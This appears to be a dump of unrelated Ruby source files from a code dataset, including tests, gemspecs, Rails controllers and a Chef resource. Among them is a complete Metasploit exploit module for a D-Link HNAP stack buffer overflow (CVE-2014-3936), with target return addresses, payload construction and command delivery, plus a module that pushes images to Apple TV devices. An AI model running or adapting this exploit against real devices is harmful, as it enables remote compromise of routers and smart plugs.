01c2995d449e27d27be3a0423a2323b8c543c9d2 | 1,351 | require 'minitest/autorun'
require_relative 'roman_numerals'
# Common test data version: 1.0.0 070e8d5
# Exercism-style scaffold: only the first test is enabled; the rest call
# `skip` until the student unlocks them, exactly as in the generated file.
class RomanNumeralsTest < Minitest::Test
  # Expected Roman numeral for each Arabic number under test.
  EXPECTED = {
    1 => 'I', 2 => 'II', 3 => 'III', 4 => 'IV', 5 => 'V', 6 => 'VI',
    9 => 'IX', 27 => 'XXVII', 48 => 'XLVIII', 59 => 'LIX', 93 => 'XCIII',
    141 => 'CXLI', 163 => 'CLXIII', 402 => 'CDII', 575 => 'DLXXV',
    911 => 'CMXI', 1024 => 'MXXIV', 3000 => 'MMM'
  }.freeze

  EXPECTED.each do |arabic, roman|
    # Generates test_1, test_2, ... test_3000 — same names as the scaffold.
    define_method("test_#{arabic}") do
      skip unless arabic == 1
      assert_equal roman, arabic.to_roman
    end
  end
end
| 14.072917 | 41 | 0.658031 |
b9c0966414000d5b5319d88296401ccd69d63eb5 | 11 | replicas 1
| 5.5 | 10 | 0.818182 |
1cfe87175455164e39520c14cb493b87c270168a | 5,094 | #
# Be sure to run `pod spec lint ReduxSwift.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
  # ――― Metadata ―――
  s.name    = "redux-swift"
  s.version = "0.1.1"
  s.summary = "A basic implementation of Redux state-management in Swift"
  s.description = <<-DESC
A basic implementation of Redux state-management in Swift. Additionally has first-class support for thunks (async actions)
  DESC
  s.homepage = "https://github.com/andyksaw/ReduxSwift"
  s.license  = { :type => "MIT", :file => "LICENSE.md" }
  s.author   = "andyksaw"

  # ――― Platform ―――
  s.platform      = :ios, "8.0"
  s.swift_version = '4.0'

  # ――― Source location ―――
  s.source = { :git => "https://github.com/andyksaw/ReduxSwift.git", :tag => "#{s.version}" }

  # ――― Compiled sources ―――
  s.source_files  = "ReduxSwift/**/*.{h,swift}"
  s.exclude_files = "Classes/Exclude"
end
| 36.647482 | 122 | 0.599333 |
# Fetches a single Hacker News story by id, upserts it into Item, links
# it to the NewItem slot for the given location, and pushes the freshly
# rendered partials out over ActionCable.
class LoadNewItemJob < ApplicationJob
  queue_as :default

  def perform(new_news_location, hn_story_id)
    payload = HTTP.get("https://hacker-news.firebaseio.com/v0/item/#{hn_story_id}.json?print=pretty").to_s
    story_json = JSON.parse(payload)
    return if story_json.nil? # HN returns JSON null for unknown ids

    item = Item.where(hn_id: hn_story_id).first_or_create
    item.populate(story_json)
    item.save

    new_item = NewItem.where(location: new_news_location).first_or_create
    new_item.item = item
    new_item.save

    broadcast(new_item)
  rescue URI::InvalidURIError => error
    # Same behaviour as before: a malformed URI is logged and swallowed.
    logger.error error
  end

  private

  # Pushes the rendered partials to the location channel and the
  # per-item channel.
  def broadcast(new_item)
    ActionCable.server.broadcast "NewItemChannel:#{new_item.location}", {
      message: NewsController.render(new_item.item).squish,
      location: new_item.location
    }
    ActionCable.server.broadcast "ItemsListChannel:#{new_item.item.id}", {
      item: ItemsController.render(new_item.item).squish,
      item_id: new_item.item.id
    }
  end
end
| 31.290323 | 122 | 0.686598 |
ed901f1a184a58b2d57a036f9bc1b29097623fb6 | 622 | require 'test_helper'
describe CacheWarp do
  # These are live integration checks, so real HTTP must be permitted
  # for the duration of each example.
  before { WebMock.allow_net_connect! }
  after  { WebMock.disable_net_connect! }

  # Runs the CLI quietly; the exit status is the assertion subject.
  def run_cachewarp(uri)
    system("bundle exec cachewarp #{uri} --quiet")
  end

  describe "when cachewarp hits http://www.akamai.com/" do
    it "should report it as cached" do
      assert(run_cachewarp('http://www.akamai.com/'))
    end
  end

  describe "when cachewarp hits http://www.google.com/" do
    it "should report it as not cached" do
      refute(run_cachewarp('http://www.google.com/'))
    end
  end
end
1c38d28c4fdf8e6da6288d865ce1a21f84bae18d | 973 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'run_shell/version'
Gem::Specification.new do |spec|
  # Gem identity
  spec.name     = "run_shell"
  spec.version  = RunShell::VERSION
  spec.authors  = ["bruce"]
  spec.email    = ["[email protected]"]
  spec.summary  = %q{run shell}
  spec.description = %q{run shell }
  spec.homepage = ""
  spec.license  = "MIT"

  # Packaged files: everything tracked by git; bin/* become executables
  # and test/spec/features are kept as test files.
  spec.files         = `git ls-files -z`.split("\x0")
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  # Runtime and development dependencies
  spec.add_dependency 'activerecord', ['>= 3.0', '< 5.0']
  spec.add_development_dependency "bundler", "~> 1.6"
  spec.add_development_dependency "rake"
  spec.add_development_dependency 'railties', ['>= 3.0', '< 5.0']
  spec.add_development_dependency "rspec-rails", "~> 2.14"
end
| 34.75 | 74 | 0.633094 |
28736fea3cc944a21b5728e45ba1ea4c4791a6f5 | 2,287 | #
# Cookbook:: hashicorp-vault
# Resource:: config_listener
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
unified_mode true
# Pull in the shared vault HCL config helpers (base, item, item_type).
%w(base item item_type).each { |t| use "partial/_config_hcl_#{t}" }
# Loads the currently-deployed listener configuration so Chef can diff it
# against the desired state.
load_current_value do |new_resource|
  case vault_mode
  when :server
    # Server mode: a single config file owned by this resource.
    current_value_does_not_exist! unless ::File.exist?(new_resource.config_file)
    options vault_hcl_config_current_load(config_file).dig(vault_hcl_config_type, new_resource.type)
  when :agent
    # Agent mode: listener entries are accumulated in one file, so filter
    # the loaded config down to entries matching this resource's type.
    option_data = array_wrap(vault_hcl_config_current_load(new_resource.config_file, vault_hcl_config_type)).select { |l| l.keys.first.eql?(new_resource.type) }
    current_value_does_not_exist! if nil_or_empty?(option_data)
    # More than one match means the filter is ambiguous; refuse to guess.
    raise Chef::Exceptions::InvalidResourceReference,
          "Filter matched #{option_data.count} listener configuration items but only should match one." if option_data.count > 1
    options option_data.first&.fetch(type)
  end
  # Mirror the on-disk ownership and permissions of the config file.
  if ::File.exist?(new_resource.config_file)
    owner ::Etc.getpwuid(::File.stat(new_resource.config_file).uid).name
    group ::Etc.getgrgid(::File.stat(new_resource.config_file).gid).name
    mode ::File.stat(new_resource.config_file).mode.to_s(8)[-4..-1]
  end
end
action :create do
  converge_if_changed { vault_hcl_resource_template_add }
  # We have to do this twice as the agent config file is accumulated and converge_if_changed won't always fire
  vault_hcl_resource_template_add if new_resource.vault_mode.eql?(:agent)
end
action :delete do
  case vault_mode
  when :server
    # Server mode: the whole file belongs to this resource; delete it.
    edit_resource(:file, new_resource.config_file) { action(:delete) } if ::File.exist?(new_resource.config_file)
  when :agent
    # Agent mode: only remove this resource's entry from the accumulator.
    converge_by('Remove configuration from accumulator template') { vault_hcl_resource_template_remove } if vault_hcl_resource_template?
  end
end
878fd4f8492d8af9a8e2b8c968864ad684b3e641 | 144 | $:.unshift File.expand_path("../../lib/table2png", __FILE__)
require 'bundler/setup'
require 'imgkit'
require 'chunky_png'
require 'table2png'
| 20.571429 | 60 | 0.743056 |
e286543767956b6f5c6621a7b463f15ac0699d3c | 10,352 | class PaypalAccountsController < ApplicationController
before_filter do |controller|
controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_view_your_settings")
end
before_filter :ensure_paypal_enabled
PaypalAccountForm = FormUtils.define_form("PaypalAccountForm")
DataTypePermissions = PaypalService::DataTypes::Permissions
def show
return redirect_to action: :new unless PaypalHelper.account_prepared_for_user?(@current_user.id, @current_community.id)
m_account = accounts_api.get(
community_id: @current_community.id,
person_id: @current_user.id
).maybe
@selected_left_navi_link = "payments"
community_ready_for_payments = PaypalHelper.community_ready_for_payments?(@current_community)
unless community_ready_for_payments
flash.now[:warning] = t("paypal_accounts.new.admin_account_not_connected",
contact_admin_link: view_context.link_to(
t("paypal_accounts.new.contact_admin_link_text"),
new_user_feedback_path)).html_safe
end
render(locals: {
community_ready_for_payments: community_ready_for_payments,
left_hand_navigation_links: settings_links_for(@current_user, @current_community),
paypal_account_email: m_account[:email].or_else(""),
paypal_account_state: m_account[:state].or_else(:not_connected),
change_url: ask_order_permission_person_paypal_account_path(@current_user)
})
end
def new
return redirect_to action: :show if PaypalHelper.account_prepared_for_user?(@current_user.id, @current_community.id)
m_account = accounts_api.get(
community_id: @current_community.id,
person_id: @current_user.id
).maybe
@selected_left_navi_link = "payments"
community_ready_for_payments = PaypalHelper.community_ready_for_payments?(@current_community)
unless community_ready_for_payments
flash.now[:warning] = t("paypal_accounts.new.admin_account_not_connected",
contact_admin_link: view_context.link_to(
t("paypal_accounts.new.contact_admin_link_text"),
new_user_feedback_path)).html_safe
end
community_currency = @current_community.default_currency
payment_settings = payment_settings_api.get_active(community_id: @current_community.id).maybe.get
community_country_code = LocalizationUtils.valid_country_code(@current_community.country)
render(locals: {
community_ready_for_payments: community_ready_for_payments,
left_hand_navigation_links: settings_links_for(@current_user, @current_community),
order_permission_action: ask_order_permission_person_paypal_account_path(@current_user),
billing_agreement_action: ask_billing_agreement_person_paypal_account_path(@current_user),
paypal_account_form: PaypalAccountForm.new,
paypal_account_state: m_account[:order_permission_state].or_else(""),
paypal_account_email: m_account[:email].or_else(""),
change_url: ask_order_permission_person_paypal_account_path(@current_user),
commission_from_seller: t("paypal_accounts.commission", commission: payment_settings[:commission_from_seller]),
minimum_commission: Money.new(payment_settings[:minimum_transaction_fee_cents], community_currency),
commission_type: payment_settings[:commission_type],
currency: community_currency,
create_url: "https://www.paypal.com/#{community_country_code}/signup",
upgrade_url: "https://www.paypal.com/#{community_country_code}/upgrade"
})
end
def ask_order_permission
return redirect_to action: :new unless PaypalHelper.community_ready_for_payments?(@current_community)
# Select paypal account connect flow
flow = use_new_connect_flow?(@current_community) ? :new : :old
callback_url = flow == :new ? paypal_connect_person_paypal_account_url : permissions_verified_person_paypal_account_url
community_country_code = LocalizationUtils.valid_country_code(@current_community.country)
response = accounts_api.request(
body: PaypalService::API::DataTypes.create_create_account_request(
{
community_id: @current_community.id,
person_id: @current_user.id,
callback_url: callback_url,
country: community_country_code
}),
flow: flow)
permissions_url = response.data[:redirect_url]
if permissions_url.blank?
flash[:error] = t("paypal_accounts.new.could_not_fetch_redirect_url")
return redirect_to action: :new
else
return redirect_to permissions_url
end
end
def ask_billing_agreement
return redirect_to action: :new unless PaypalHelper.community_ready_for_payments?(@current_community)
account_response = accounts_api.get(
community_id: @current_community.id,
person_id: @current_user.id
)
m_account = account_response.maybe
case m_account[:order_permission_state]
when Some(:verified)
response = accounts_api.billing_agreement_request(
community_id: @current_community.id,
person_id: @current_user.id,
body: PaypalService::API::DataTypes.create_create_billing_agreement_request(
{
description: t("paypal_accounts.new.billing_agreement_description"),
success_url: billing_agreement_success_person_paypal_account_url,
cancel_url: billing_agreement_cancel_person_paypal_account_url
}
))
billing_agreement_url = response.data[:redirect_url]
if billing_agreement_url.blank?
flash[:error] = t("paypal_accounts.new.could_not_fetch_redirect_url")
return redirect_to action: :new
else
return redirect_to billing_agreement_url
end
else
redirect_to action: ask_order_permission
end
end
def permissions_verified
unless params[:verification_code].present?
return flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.permissions_not_granted"))
end
response = accounts_api.create(
community_id: @current_community.id,
person_id: @current_user.id,
order_permission_request_token: params[:request_token],
body: PaypalService::API::DataTypes.create_account_permission_verification_request(
{
order_permission_verification_code: params[:verification_code]
}
),
flow: :old)
if response[:success]
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
else
flash_error_and_redirect_to_settings(error_response: response) unless response[:success]
end
end
def paypal_connect
onboarding_params = params.slice(
:merchantId,
:merchantIdInPayPal,
:permissionsGranted,
:accountStatus,
:consentStatus,
:productIntentID,
:isEmailConfirmed,
:returnMessage)
response = accounts_api.create(
community_id: @current_community.id,
person_id: @current_user.id,
order_permission_request_token: nil,
body: PaypalService::API::DataTypes.create_account_permission_verification_request(
{
onboarding_params: onboarding_params,
}
),
flow: :new)
if response[:success]
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
else
flash_error_and_redirect_to_settings(error_response: response) unless response[:success]
end
end
def billing_agreement_success
response = accounts_api.billing_agreement_create(
community_id: @current_community.id,
person_id: @current_user.id,
billing_agreement_request_token: params[:token]
)
if response[:success]
redirect_to show_paypal_account_settings_payment_path(@current_user.username)
else
case response.error_msg
when :billing_agreement_not_accepted
flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.billing_agreement_not_accepted"))
when :wrong_account
flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.billing_agreement_wrong_account"))
else
flash_error_and_redirect_to_settings(error_response: response)
end
end
end
def billing_agreement_cancel
accounts_api.delete_billing_agreement(
community_id: @current_community.id,
person_id: @current_user.id
)
flash[:error] = t("paypal_accounts.new.billing_agreement_canceled")
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
end
private
# Before filter
def ensure_paypal_enabled
unless PaypalHelper.paypal_active?(@current_community.id)
flash[:error] = t("paypal_accounts.new.paypal_not_enabled")
redirect_to person_settings_path(@current_user)
end
end
def flash_error_and_redirect_to_settings(error_response: nil, error_msg: nil)
error_msg =
if (error_msg)
error_msg
elsif (error_response && error_response[:error_code] == "570058")
t("paypal_accounts.new.account_not_verified")
elsif (error_response && error_response[:error_code] == "520009")
t("paypal_accounts.new.account_restricted")
else
t("paypal_accounts.new.something_went_wrong")
end
flash[:error] = error_msg
redirect_to action: error_redirect_action
end
def error_redirect_action
if PaypalHelper.account_prepared_for_user?(@current_user.id, @current_community.id)
:show
else
:new
end
end
def payment_gateway_commission(community_id)
p_set =
Maybe(payment_settings_api.get_active(community_id: community_id))
.map {|res| res[:success] ? res[:data] : nil}
.select {|set| set[:payment_gateway] == :paypal }
.or_else(nil)
raise ArgumentError.new("No active paypal gateway for community: #{community_id}.") if p_set.nil?
p_set[:commission_from_seller]
end
# TODO Per community "Feature flag" for using new paypal account connect flow
def use_new_connect_flow?(community)
false
end
def paypal_minimum_commissions_api
PaypalService::API::Api.minimum_commissions
end
def payment_settings_api
TransactionService::API::Api.settings
end
def accounts_api
PaypalService::API::Api.accounts_api
end
end
| 35.452055 | 123 | 0.736862 |
# This gem patches ActiveRecord 4 internals, so refuse to load on any
# other major version before requiring the patch files.
unless ActiveRecord::VERSION::MAJOR == 4
  raise "activerecord-postgresql-expression supports activerecord ~> 4.x"
end

require 'activerecord-postgresql-expression/active_record/schema_dumper'
require 'activerecord-postgresql-expression/active_record/connection_adapters/postgresql/schema_statements'
| 43.571429 | 109 | 0.839344 |
018c5f3287b4bd7155cac9049358d9c4e1c07248 | 2,814 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
if defined?(Bundler)
# If you precompile assets before deploying to production, use this line
Bundler.require(*Rails.groups(:assets => %w(development test)))
# If you want your assets lazily compiled in production, use this line
# Bundler.require(:default, :assets, Rails.env)
end
module AdminDemo
  class Application < Rails::Application
    # Settings here apply application-wide. Files under
    # config/environments/* take precedence, and everything in
    # config/initializers is loaded automatically.

    # Render templates as UTF-8 (Ruby 1.9 default encoding).
    config.encoding = "utf-8"

    # Keep passwords out of the logs.
    config.filter_parameters += [:password]

    # Escape HTML entities when rendering JSON.
    config.active_support.escape_html_entities_in_json = true

    # Require models to whitelist attributes for mass assignment
    # (attr_accessible / attr_protected declarations).
    config.active_record.whitelist_attributes = true

    # Asset pipeline; bump the version string to expire all assets.
    config.assets.enabled = true
    config.assets.version = '1.0'
  end
end
| 44.666667 | 100 | 0.734542 |
# Returns the sum of the two numbers.
def add(first_addend, second_addend)
  first_addend + second_addend
end
# Returns the product of the two numbers.
def multiply(first_factor, second_factor)
  first_factor * second_factor
end
# Ad-hoc smoke checks: each line prints "true" when the helpers above
# behave as expected.
puts add(2, 2) == 4
puts add(5, 4) == 9
puts multiply(add(2, 2), add(5, 4)) == 36
| 13.75 | 41 | 0.6 |
1a79b812df7670e35e9bd105ddd17ec5f6354d60 | 415 | require 'test_helper'
class GatewayTest < Test::Unit::TestCase
  # The factory should build the offline gateway and report its name.
  def test_offline_gateway
    @gateway = ActiveMerchant::Billing::Gateway.factory(:offline)
    assert @gateway
    assert_equal @gateway.display_name, "Offline"
  end

  # Same check for the Braintree "blue platform" (vault) gateway.
  def test_braintree_vault_gateway
    @gateway = ActiveMerchant::Billing::Gateway.factory(:braintree_vault)
    assert @gateway
    assert_equal @gateway.display_name, "Braintree (Blue Platform)"
  end
end
bbd038ac9356f016fdbd8708e4e6b28281b288f6 | 55 | class Link < ApplicationRecord
belongs_to :batch
end
| 13.75 | 30 | 0.8 |
62f500e8ebd8cc70c7db22301021e53be01ac9bb | 5,079 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link HNAP Request Remote Buffer Overflow',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different
D-Link devices. The vulnerability is due to an stack based buffer overflow while
handling malicious HTTP POST requests addressed to the HNAP handler. This module
has been successfully tested on D-Link DIR-505 in an emulated environment.
},
'Author' =>
[
'Craig Heffner', # vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'References' =>
[
['CVE', '2014-3936'],
['BID', '67651'],
['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
],
'Targets' =>
[
#
# Automatic targeting via fingerprinting
#
[ 'Automatic Targeting', { 'auto' => true } ],
[ 'D-Link DSP-W215 - v1.0',
{
'Offset' => 1000000,
'Ret' => 0x405cac, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.06',
{
'Offset' => 30000,
'Ret' => 0x405234, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.07',
{
'Offset' => 30000,
'Ret' => 0x405c5c, # jump to system - my_cgi.cgi
}
]
],
'DisclosureDate' => 'May 15 2014',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
res = send_request_cgi({
'uri' => "/HNAP1/",
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code)
if res.body =~ /DIR-505/ && res.body =~ /1.07/
@my_target = targets[3] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
@my_target = targets[2] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
@my_target = target
check_code = check
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
end
if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
end
print_status("#{peer} - Exploiting #{@my_target.name}...")
execute_cmdstager(
:flavor => :echo,
:linemax => 185
)
end
def prepare_shellcode(cmd)
buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
buf << rand_text_alpha_upper(4) # $s0, don't care
buf << rand_text_alpha_upper(4) # $s1, don't care
buf << rand_text_alpha_upper(4) # $s2, don't care
buf << rand_text_alpha_upper(4) # $s3, don't care
buf << rand_text_alpha_upper(4) # $s4, don't care
buf << [@my_target.ret].pack("N") # $ra
# la $t9, system
# la $s1, 0x440000
# jalr $t9 ; system
# addiu $a0, $sp, 0x28 # our command
buf << rand_text_alpha_upper(40) # Stack filler
buf << cmd # Command to execute
buf << "\x00" # NULL-terminate the command
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/HNAP1/",
'encode_params' => false,
'data' => shellcode
}, 5)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
| 33.196078 | 130 | 0.541642 |
032bc1af6872d0afa6bf37160330d4c65985f884 | 3,744 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple TV Image Remote Control',
'Description' => %q(
This module will show an image on an AppleTV device for a period of time.
Some AppleTV devices are actually password-protected, in that case please
set the PASSWORD datastore option. For password brute forcing, please see
the module auxiliary/scanner/http/appletv_login.
),
'Author' =>
[
'0a29406d9794e4f9b30b3c5d6702c708', # Original work
'sinn3r' # You can blame me for mistakes
],
'References' =>
[
['URL', 'http://nto.github.io/AirPlay.html']
],
'DefaultOptions' => { 'HttpUsername' => 'AirPlay' },
'License' => MSF_LICENSE
))
# Make the PASSWORD option more visible and hope the user is more aware of this option
register_options([
Opt::RPORT(7000),
OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),
OptPath.new('FILE', [true, 'Image to upload and show']),
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
])
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
# so deregister them so we don't overwhelm the user with fake options.
deregister_options(
'HTTP::uri_encode_mode', 'HTTP::uri_full_url', 'HTTP::pad_method_uri_count',
'HTTP::pad_uri_version_count', 'HTTP::pad_method_uri_type', 'HTTP::pad_uri_version_type',
'HTTP::method_random_valid', 'HTTP::method_random_invalid', 'HTTP::method_random_case',
'HTTP::uri_dir_self_reference', 'HTTP::uri_dir_fake_relative', 'HTTP::uri_use_backslashes',
'HTTP::pad_fake_headers', 'HTTP::pad_fake_headers_count', 'HTTP::pad_get_params',
'HTTP::pad_get_params_count', 'HTTP::pad_post_params', 'HTTP::pad_post_params_count',
'HTTP::uri_fake_end', 'HTTP::uri_fake_params_start', 'HTTP::header_folding',
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'NTLM::SendLM', 'NTLM::SendNTLM',
'NTLM::SendSPN', 'NTLM::UseLMKey', 'DOMAIN', 'DigestAuthIIS', 'VHOST'
)
end
#
# Sends an image request to AppleTV. HttpClient isn't used because we actually need to keep
# the connection alive so that the video can keep playing.
#
def send_image_request(opts)
http = nil
http = Rex::Proto::Http::Client.new(
rhost,
rport.to_i,
{
'Msf' => framework,
'MsfExploit' => self
},
ssl,
ssl_version,
proxies,
datastore['HttpUsername'],
datastore['HttpPassword']
)
add_socket(http)
http.set_config('agent' => datastore['UserAgent'])
req = http.request_raw(opts)
res = http.send_recv(req)
Rex.sleep(datastore['TIME']) if res.code == 200
http.close
res
end
def get_image_data
File.open(datastore['FILE'], 'rb') { |f| f.read(f.stat.size) }
end
def show_image
image = get_image_data
opts = {
'method' => 'PUT',
'uri' => '/photo',
'data' => image
}
res = send_image_request(opts)
if !res
print_status("The connection timed out")
elsif res.code == 200
print_status("Received HTTP 200")
else
print_error("The request failed due to an unknown reason")
end
end
def run
print_status("Image request sent. Duration set: #{datastore['TIME']} seconds")
show_image
end
end
| 31.2 | 97 | 0.633814 |
38a9345d802fb0749ffa475d809aa03ad902e183 | 1,812 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Mutations::Boards::Issues::IssueMoveList do
let_it_be(:group) { create(:group, :public) }
let_it_be(:project) { create(:project, group: group) }
let_it_be(:board) { create(:board, group: group) }
let_it_be(:epic) { create(:epic, group: group) }
let_it_be(:user) { create(:user) }
let_it_be(:issue1) { create(:labeled_issue, project: project, relative_position: 3) }
let_it_be(:existing_issue1) { create(:labeled_issue, project: project, relative_position: 10) }
let_it_be(:existing_issue2) { create(:labeled_issue, project: project, relative_position: 50) }
let(:mutation) { described_class.new(object: nil, context: { current_user: user }, field: nil) }
let(:params) { { board: board, project_path: project.full_path, iid: issue1.iid } }
let(:move_params) do
{
epic_id: epic.to_global_id,
move_before_id: existing_issue2.id,
move_after_id: existing_issue1.id
}
end
before do
stub_licensed_features(epics: true)
project.add_maintainer(user)
end
subject do
mutation.resolve(**params.merge(move_params))
end
describe '#resolve' do
context 'when user has access to the epic' do
before do
group.add_developer(user)
end
it 'moves and repositions issue' do
subject
expect(issue1.reload.epic).to eq(epic)
expect(issue1.relative_position).to be < existing_issue2.relative_position
expect(issue1.relative_position).to be > existing_issue1.relative_position
end
end
context 'when user does not have access to the epic' do
it 'does not update issue' do
subject
expect(issue1.reload.epic).to be_nil
expect(issue1.relative_position).to eq(3)
end
end
end
end
| 30.711864 | 98 | 0.690949 |
ed8c316b7bddd6cf4887d8769e666ea4ffe776a4 | 948 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'nouislider/rails/version'
Gem::Specification.new do |spec|
spec.name = "nouislider-rails"
spec.version = Nouislider::Rails::VERSION
spec.authors = ["Charles Lee"]
spec.email = ["[email protected]"]
spec.summary = "nouislider.js for the Rails asset pipeline."
spec.description = "Currently tracking #{Nouislider::Rails::VERSION} of noUiSlider: https://github.com/leongersen/noUiSlider). All credit and thanks to @leongersen for the awesome library."
spec.homepage = "https://github.com/chug2k/nouislider-rails"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.require_paths = ["lib"]
spec.add_dependency "railties", ">= 3.1"
spec.add_development_dependency "bundler", "~> 1.5"
spec.add_development_dependency "rake"
end
| 41.217391 | 193 | 0.681435 |
79556cd0e960eba82e4c169e07715a02691ad601 | 789 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
User.create!(name: "Example User",
email: "[email protected]",
password: "foobar",
password_confirmation: "foobar",
admin: true,
activated: true,
activated_at: Time.zone.now)
99.times do |n|
name = Faker::Name.name
email = "example-#{n+1}@railstutorial.org"
password = "password"
User.create!(name: name, email: email, password: password, password_confirmation: password)
end | 39.45 | 111 | 0.700887 |
d51b7e661901c51633345efe4a35944c4abb9c1d | 2,319 | # spin.rb --
#
# This demonstration script creates several spinbox widgets.
#
# based on Tcl/Tk8.4.4 widget demos
if defined?($spin_demo) && $spin_demo
$spin_demo.destroy
$spin_demo = nil
end
$spin_demo = TkToplevel.new {|w|
title("Spinbox Demonstration")
iconname("spin")
positionWindow(w)
}
base_frame = TkFrame.new($spin_demo).pack(:fill=>:both, :expand=>true)
TkLabel.new(base_frame,
:font=>$font, :wraplength=>'5i', :justify=>:left,
:text=><<EOL).pack(:side=>:top)
Three different spin-boxes are displayed below. \
You can add characters by pointing, clicking and typing. \
The normal Motif editing characters are supported, along with \
many Emacs bindings. For example, Backspace and Control-h \
delete the character to the left of the insertion cursor and \
Delete and Control-d delete the chararacter to the right of the \
insertion cursor. For values that are too large to fit in the \
window all at once, you can scan through the value by dragging \
with mouse button2 pressed. Note that the first spin-box will \
only permit you to type in integers, and the third selects from \
a list of Australian cities.
If your Tk library linked to Ruby doesn't include a 'spinbox' widget, \
this demo doesn't work. Please use later version of Tk \
which supports a 'spinbox' widget.
EOL
TkFrame.new(base_frame){|f|
pack(:side=>:bottom, :fill=>:x, :pady=>'2m')
TkButton.new(f, :text=>'Dismiss', :width=>15, :command=>proc{
$spin_demo.destroy
$spin_demo = nil
}).pack(:side=>:left, :expand=>true)
TkButton.new(f, :text=>'See Code', :width=>15, :command=>proc{
showCode 'spin'
}).pack(:side=>:left, :expand=>true)
}
australianCities = [
'Canberra', 'Sydney', 'Melbourne', 'Perth', 'Adelaide',
'Brisbane', 'Hobart', 'Darwin', 'Alice Springs'
]
[
TkSpinbox.new(base_frame, :from=>1, :to=>10, :width=>10, :validate=>:key,
:validatecommand=>[
proc{|s| s == '' || /^[+-]?\d+$/ =~ s }, '%P'
]),
TkSpinbox.new(base_frame, :from=>0, :to=>3, :increment=>0.5,
:format=>'%05.2f', :width=>10),
TkSpinbox.new(base_frame, :values=>australianCities, :width=>10)
].each{|sbox| sbox.pack(:side=>:top, :pady=>5, :padx=>10)}
| 35.136364 | 75 | 0.640362 |
33835b141bfc31b6510fc3c959d7c93131f25220 | 721 | Pod::Spec.new do |s|
s.name = 'S2GeometrySwift'
s.version = '1.0.2'
s.license= { :type => 'MIT', :file => 'LICENSE' }
s.summary = 'S2 Geometry library in Swift.'
s.description = 'Swift port of S2 Geometry by Google.'
s.homepage = 'https://github.com/philip-bui/s2-geometry-swift'
s.author = { 'Philip Bui' => '[email protected]' }
s.source = { :git => 'https://github.com/philip-bui/s2-geometry-swift.git', :tag => s.version }
s.documentation_url = 'https://github.com/philip-bui/s2-geometry-swift'
s.ios.deployment_target = '8.0'
